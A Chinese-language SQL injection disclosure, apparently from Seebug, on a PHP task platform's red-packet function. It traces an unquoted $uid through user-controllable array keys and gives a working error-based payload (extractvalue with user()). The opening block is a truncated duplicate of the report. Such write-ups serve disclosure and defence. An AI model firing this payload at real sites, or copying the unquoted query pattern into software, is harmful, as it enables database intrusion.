### 简要描述: rt ### 详细说明: /www/lib/inc/CommonClass.php ``` public static function changehongbao($task_id,$moneys,$uid,$money,$title,$g) { $result=db_factory::get_one('select * from '.TABLEPRE.'witkey_space where uid='.$uid); if($g){ $newbalance=$result['balance']-$money+$moneys; db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid); keke_finance_class::insert_trust("in", "task_xg", $uid, -$money+$moneys, $newbalance); }else{ $newbalance=$result['balance']+$money; keke_finance_class::insert_trust("in", "finish_task", $uid,$money, $newbalance,$task_id); db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid); db_factory::query('update '.TABLEPRE.'witkey_space set is_hongbao=1 where uid='.$uid); db_factory::query('update '.TABLEPRE.'witkey_task_work set work_status=4 where uid='.$uid.' and task_id='.$task_id); } if(!$g){ $v_arr = array ( "红包任务" => '【'.$title.'】', "红包金额" => $money );...
### 简要描述: rt ### 详细说明: /www/lib/inc/CommonClass.php ``` public static function changehongbao($task_id,$moneys,$uid,$money,$title,$g) { $result=db_factory::get_one('select * from '.TABLEPRE.'witkey_space where uid='.$uid); if($g){ $newbalance=$result['balance']-$money+$moneys; db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid); keke_finance_class::insert_trust("in", "task_xg", $uid, -$money+$moneys, $newbalance); }else{ $newbalance=$result['balance']+$money; keke_finance_class::insert_trust("in", "finish_task", $uid,$money, $newbalance,$task_id); db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid); db_factory::query('update '.TABLEPRE.'witkey_space set is_hongbao=1 where uid='.$uid); db_factory::query('update '.TABLEPRE.'witkey_task_work set work_status=4 where uid='.$uid.' and task_id='.$task_id); } if(!$g){ $v_arr = array ( "红包任务" => '【'.$title.'】', "红包金额" => $money ); keke_msg_class::notify_user($uid, $result['username'], 'select', '红包任务完成通知',$v_arr); } return true; } ``` 可以看到uid参数没有单引号包裹带入了查询。 看看何处调用了。 /www/control/select.php ``` ...... foreach ($cbk as $key => $val) { do { $lcg = lcg_value(); } while ($lcg < 0.1); if (($key + 1) == $count) { $selefHongBao[$val] = $hongbaoSum; } else { $selefHongBao[$val] = number_format($lcg * $hongbaoSum, 2); } $hongbaoSum -= $selefHongBao[$val]; $a += $selefHongBao[$val]; } foreach ($selefHongBao as $k => $v) { CommonClass::changehongbao($task_id, $task_info[0]['task_cash'], $k, $v, $task_info[0]['task_title']); } CommonClass::changehongbao('', $task_info[0]['task_cash'], $gUid, $a, $task_info[0]['task_title'], 1); ....... ``` 可以看到 这里调用了。$k来源于 selefHongBao 的键值。 然而,这个程序是伪全局的,所以 我们可以添加一个$selefHongBao的键。 http://localhost:801/index.php?do=select post: ``` formhash=1&selefHongBao[111 and extractvalue(1,concat(0x5c,user()))]=1111&task_id=1 ``` [<img src="https://images.seebug.org/upload/201509/17025134a4928d05c06ffa2ee2c745f70651870b.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/17025134a4928d05c06ffa2ee2c745f70651870b.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201509/17025134a4928d05c06ffa2ee2c745f70651870b.png" alt="22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201509/17025134a4928d05c06ffa2ee2c745f70651870b.png)